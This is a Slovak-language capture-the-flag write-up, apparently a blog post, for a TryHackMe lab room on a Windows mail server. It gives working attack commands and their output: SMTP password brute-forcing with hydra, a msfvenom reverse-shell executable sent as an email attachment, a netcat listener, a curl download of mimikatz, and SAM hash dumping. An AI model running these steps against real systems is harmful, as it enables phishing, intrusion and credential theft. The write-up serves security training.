TryHackMe - You Got Mail (Máš poštu)
Windows mašiny sú tiež fajn
Introduction
Pozdvihnime náš level na trochu vyššiu úroveň a skúsme Medium miestnosť. Predpokladám, že sa máme dostať na webovú stránku brownbrick.co a získať prístup cez e-mailovú adresu.
Nmap
Začnime nmap skenom:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
nmap -T4 -n -sC -sV -Pn -p- 10.10.148.225
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: BRICK-MAIL, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: USER UIDL TOP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: OK IMAP4rev1 IMAP4 completed CHILDREN SORT RIGHTS=texkA0001 ACL CAPABILITY IDLE QUOTA NAMESPACE
445/tcp open microsoft-ds?
587/tcp open smtp hMailServer smtpd
| smtp-commands: BRICK-MAIL, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-02-18T19:57:00+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=BRICK-MAIL
| Not valid before: 2025-02-17T19:53:26
|_Not valid after: 2025-08-19T19:53:26
| rdp-ntlm-info:
| Target_Name: BRICK-MAIL
| NetBIOS_Domain_Name: BRICK-MAIL
| NetBIOS_Computer_Name: BRICK-MAIL
| DNS_Domain_Name: BRICK-MAIL
| DNS_Computer_Name: BRICK-MAIL
| Product_Version: 10.0.17763
|_ System_Time: 2025-02-18T19:56:52+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
Service Info: Host: BRICK-MAIL; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-02-18T19:56:52
|_ start_date: N/A
Veľa otvorených portov s poväčšine Microsoft službami
Prieskup
Spolu s otvorenými portami sme dostali aj web https://brownbrick.co, takže sa poďme pozrieť
Prejdime priamo na stránku tímu a môžeme vidieť e-mailové adresy
Spravme si zoznam, aby sme mohli neskôr Brute-forcom tie maily skúsiť
1
2
3
4
5
6
oaurelius@brownbrick.co
tchikondi@brownbrick.co
wrohit@brownbrick.co
pcathrine@brownbrick.co
lhedvig@brownbrick.co
fstamatis@brownbrick.co
A môžeme si vytvoriť zoznam hesiel pomocou nástroja cewl z celej webovej stránky
1
$ cewl --lowercase https://brownbrick.co/ > pass.txt
Brute Force
Dobre, keďže máme zoznam používateľských mien a hesiel, skúsme Brute-forcnúť prístup cez port SMTP 587/tcp, keďže bol otvorený
Použijeme hydra, pretože je to najjednoduchšie
1
hydra -L team.txt -P pass.txt 10.10.148.225 smtp -s 587
A máme hit
1
2
[587][smtp] host: 10.10.148.225 login: lhedvig@brownbrick.co password: bricks
Keďže sú tieto prihlasovacie údaje valídne, môžeme ich použiť na odosielanie e-mailov ostatným členom tímu pomocou metasploit(msvenom)
Vytvorme spustiteľný reverzný shell, aby sme maily mohli poslať ostatným členom tímu
1
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.75.122 LPORT=1337 -f exe -o shell.exe
Otvorme si port 1337 a pošlime e-mail s priloženým súborom shell.exe
1
2
nc -lvnp 1337
listening on [any] 1337 ...
A pošlime e-mail prvému členovi tímu:
1
2
sendemail -f "lhedvig@brownbrick.co" -t "oaurelius@brownbrick.co" -u "test" -m "test" -a shell.exe -s 10.10.148.225:25 -xu "lhedvig@brownbrick.co" -xp "bricks"
Feb 18 21:22:08 kali sendemail[23334]: Email was sent successfully!
A vidíme, že používateľ už klikol na našu prílohu!
1
2
3
4
5
6
7
connect to [10.11.75.122] from (UNKNOWN) [10.10.148.225] 49759
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Mail\Attachments>
whoami
brick-mail\wrohit
Vlajka užívateľa
Vlajka je na pracovnej ploche nášho používateľa, takže poďme na to
Získanie hesiel
Takže na to získanie hesiel z windowsu použijeme nástroj mimikatz
Môžeme si tak vypísať hashe zo stroja so systémom Windows, takže najprv musíme získať aplikáciu mimikatz.exe do nášho cieľového počítača
Spustíme http server na našej mašine, kde je mimikatz.exe a spustíme si lokálny http server pomocou pythonu
1
2
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Môžme si stiahnuť súbor z našej mašiny
1
2
3
4
curl http://10.11.75.122/mimikatz.exe -o mimikatz.exe
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1323k 100 1323k 0 0 1323k 0 0:00:01 --:--:-- 0:00:01 3393k
Teraz môžeme použiť mimikatz.exe na výpis hashov
1
2
3
4
5
6
7
8
mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
Potrebujeme si zvýšiť privilégiá pomocou token::elevate
1
2
mimikatz # privilege::debug
Privilege '20' OK
A vypíšeme hashe
1
2
3
4
mimikatz # lsadump::sam
RID : 000003f6 (1014)
User : wrohit
Hash NTLM: 8458995f1d0a4b0c107fb8e23362c814
Teraz prelomíme hash pomocou crackstation.net
A heslo na hMail sa nachádza
1
2
C:\Program Files (x86)\hMailServer\Bin>type hMailServer.INI
AdministratorPassword=5f4dcc3b5aa765d61d8327deb882cf99
Opäť Crackstation a máme hotovo
